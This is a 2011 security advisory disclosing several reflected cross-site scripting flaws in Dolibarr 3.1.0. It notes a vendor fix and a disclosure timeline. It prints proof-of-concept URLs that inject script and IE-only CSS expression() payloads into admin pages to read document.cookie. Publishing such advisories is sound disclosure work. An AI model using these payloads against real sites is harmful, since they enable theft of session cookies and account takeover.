INFOSERVE-ADV2011-03 - Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory:
|
Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
|
Advisory ID:
|
INFOSERVE-ADV2011-03
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on Dolibarr 3.1.0 other versions may also be affected
|
Vendor URL:
|
|
Vendor Status:
|
fixed in the 3.1 branch
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
Dolibarr 3.1.0 is prone to multiple XSS vulnerability
==============
PoC-Exploit
==============
Cross-Site-Scripting – parameter ‘username’
PoC-Exploit
==============
Cross-Site-Scripting – parameter ‘username’
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>&=3&optioncss=print |
IE-only
http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie)) http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie)) |
=====
Solution:
=====
Fixed in the 3.1 branch
================
Disclosure Timeline:
================
08-Nov-2011 – vendor informed
09-Nov-2011 – vendor fix in the 3.1 branch
09-Nov-2011 – release date of this security advisory
09-Nov-2011 – Post on BugTraq
====
Credits:
====
Vulnerabilities found and advisory written by the INFOSERVE Security Team
=======
References:
=======
Comments
Display comments as Linear | Threaded